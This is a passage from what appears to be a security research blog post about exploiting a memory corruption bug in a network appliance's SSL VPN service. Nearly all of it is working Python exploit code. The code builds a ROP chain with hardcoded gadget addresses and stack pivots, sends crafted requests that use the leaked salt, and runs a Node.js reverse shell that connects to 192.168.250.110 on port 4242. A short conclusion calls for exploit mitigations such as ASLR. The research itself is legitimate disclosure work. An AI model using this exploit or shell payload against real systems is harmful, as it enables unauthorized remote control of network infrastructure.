    rop+=u64(0x02c85e40)       # and rax, rcx; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0)                # <rcx = 0>
    rop+=u64(0x02166fa9)       # or rcx, rax; ...; ret;

    # 2. write "/bin/node\0-e\0" to a scratch buffer
    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[0])  # "/bin/nod"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret

    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[1])  # "e\0-e\0\0\0\0"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr+8)   # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret

    # setup arguments for execl
    rop+=u64(0x02ca0763)       # pop rdi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02b76f39)       # pop rdx
    rop+=u64(argv_1)           # "-e"
    rop+=u64(0x0289a815)       # REX.WRXB pop r8
    rop+=u64(0)
    # rcx already points to the last argument

    # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL);
    rop+=u64(0x0043b170)       # execl@PLT
    # pad to size
    assert len(rop) < 0x100-1
    return rop

shell=b"""(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/node", ["-i"]);
    var client = new net.Socket();
    client.connect(4242, "192.168.250.110", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
"""

payload_size=0x2000-0x18-7
payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6))
payload+=pad(shell, 0x1000-0x100)
payload+=make_ropchain()
payload =pad(payload, payload_size)


sess=requests.Session()
r=sess.get(BASEURL+"/remote/info", verify=False)
salt=r.content.split(b"salt='")[1].split(b"'")[0]
print("salt: "+salt.decode())
ssl_offset=0x2000-0x18-4
handshake_func=ssl_offset + 0x30
in_init = ssl_offset+0x64


# set rsp = *SSL
PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret
# rsp=*SSL+0x290
PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret;
# rsp = *SSL-0x100
PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret;


seeds=[]
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30,  PIVOT_1))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00,  PIVOT_2))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1))
seeds.extend(gen_seeds_u8(salt, in_init, 1))

for i in range(24):
    create_ssl_conn()
ssocks[-2].send(b'A'*0x2001)

for i in seeds:
    make_req(sess, salt, i[0], i[1], payload)

Conclusion

This vulnerability is yet another which would not have been nearly as impactful if basic exploit mitigations (ASLR in this case) were implemented. This is a pattern we have observed across most major network appliances, and we hope that the prevalence of memory corruption vulnerabilities results in a push to implement these mitigations. We had a lot of fun developing this exploit, and we would once again like to thank Lexfo for their helpful blog post which laid out a very clear roadmap of how to exploit this vulnerability. We look forward to continuing to share our research on network appliance vulnerabilities in the future.
